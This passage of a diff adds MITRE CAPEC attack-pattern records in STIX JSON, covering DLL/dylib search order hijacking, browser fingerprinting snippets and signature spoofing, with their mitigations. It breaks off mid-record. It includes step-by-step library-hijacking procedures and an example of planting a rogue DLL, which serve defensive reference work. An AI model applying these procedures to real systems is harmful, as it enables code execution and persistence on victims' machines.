+ }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71f0bd8e-33e6-4ef2-8778-ffdf5c5609a9", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS", + "id": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48504b4a-e44a-448e-a9a2-3897cd085eda", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user", + "id": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9ce000-b8ad-473e-8a4f-892b64b4c43e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not use the DBMS machine for anything else other than the database", + "id": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95f621c4-31d2-4fd4-89e2-7b69c24af990", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.", + "id": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca5847b9-62fc-42d7-8ec4-e4068cd7df27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Use an intrusion detection system to monitor network connections and logs on the database host.", + "id": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce982c38-66be-4428-a92d-ebb29735fb27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised", + "id": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b22a10d-ca9b-4638-b525-d142e88f10e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.", + "external_references": [ + { + "external_id": "CAPEC-471", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow:DLL search order hijacking", + "external_id": "T1574.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/001" + }, + { + "description": "Hijack Execution Flow: Dylib Hijacking", + "external_id": "T1574.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/004" + }, + { + "description": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "M Trends Report, 2011, Mandiant", + "external_id": "REF-409", + "source_name": "reference_from_CAPEC", + "url": "https://www.mandiant.com" + } + ], + "id": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Search Order Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.", + "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target general susceptibility: An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.

    2. Techniques
    The attacker uses a tool such as the OSX \"otool\" utility or manually probes whether the target application uses dynamically linked libraries.
    The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.

Experiment

  1. Craft malicious libraries: The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.

    2. Techniques
    The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.

Exploit

  1. Redirect the access to libraries to the malicious libraries: The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.

    2. Techniques
    The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.
    The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.
    The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38.
", + "x_capec_prerequisites": [ + "Attacker has a mechanism to place its malicious libraries in the needed location on the file system." + ], + "x_capec_skills_required": { + "Medium": "Ability to create a malicious library." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected", + "id": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2809e228-142a-488a-a2f7-22b0bdda15e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "spec_version": "2.1", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sign system DLLs so that unauthorized DLLs can be detected.", + "id": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--189e08be-aa2a-4fe1-9544-7d387f8d6fd4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "spec_version": "2.1", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.", + "external_references": [ + { + "external_id": "CAPEC-472", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29", + "external_id": "REF-410", + "source_name": "reference_from_CAPEC", + "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/" + } + ], + "id": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Browser Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following code snippets can be used to detect various browsers:\n \n Firefox 2/3\n FF=/a/[-1]=='a'\n Firefox 3\n FF3=(function x(){})[-5]=='x'\n Firefox 2\n FF2=(function x(){})[-6]=='x'\n IE\n IE='\\v'=='v'\n Safari\n Saf=/a/.__proto__=='//'\n Chrome\n Chr=/source/.test((/a/.toString+''))\n Opera\n Op=/^function \\(/.test([].sort)\n \n " + ], + "x_capec_prerequisites": [ + "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Java Script in the browser", + "id": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-472-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ed3172-e4ba-44b6-90f3-93e92247d779", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "spec_version": "2.1", + "target_ref": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "external_id": "CAPEC-473", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Masquerading: Invalid Code Signature", + "external_id": "T1036.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/001" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47" + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-474", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/474.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Sigbjørn Vik, Security breach stopped, 2013--06---26, http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack", + "external_id": "REF-411", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Patrick Morley, Bit9 and Our Customers’ Security, 2013--02---08, https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/", + "external_id": "REF-412", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Brad Arkin, Inappropriate Use of Adobe Code Signing Certificate, 2012--09---27, http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html", + "external_id": "REF-413", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An authoritative or reputable signer is storing their private signature key with insufficient protection." + ], + "x_capec_skills_required": { + "High": "Ability to compromise systems containing sensitive data", + "Low": "Knowledge of common location methods and access methods to sensitive data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to private keys from non-supervisory accounts", + "id": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to administrative personnel and processes only", + "id": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--af927d47-9f4f-4c35-abe7-1b27e76baf07", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all remote methods are secured", + "id": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d744a39d-65e1-4dc4-800a-54487a665643", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all services are patched and up to date", + "id": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3605759e-9ca2-443d-901d-741c0c2033c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.", + "external_references": [ + { + "external_id": "CAPEC-475", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/475.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "description": "Kenn White, Microsoft's Chain of Fools, 2020--01---15, First Principles", + "external_id": "REF-562", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lessonslearned.org/chain-of-fools/" + }, + { + "description": "Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers, 2020--01---14, National Security Agency (NSA)", + "external_id": "REF-563", + "source_name": "reference_from_CAPEC", + "url": "https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF" + }, + { + "description": "Thomas Ptacek, Thomas Pornin, Analysis of REF-563, Hacker News", + "external_id": "REF-564", + "source_name": "reference_from_CAPEC", + "url": "https://news.ycombinator.com/item?id=22048619" + } + ], + "id": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signature Spoofing by Improper Validation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI's signature validator allows the specification of a nonstandard base point (G): \"An adversary can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing 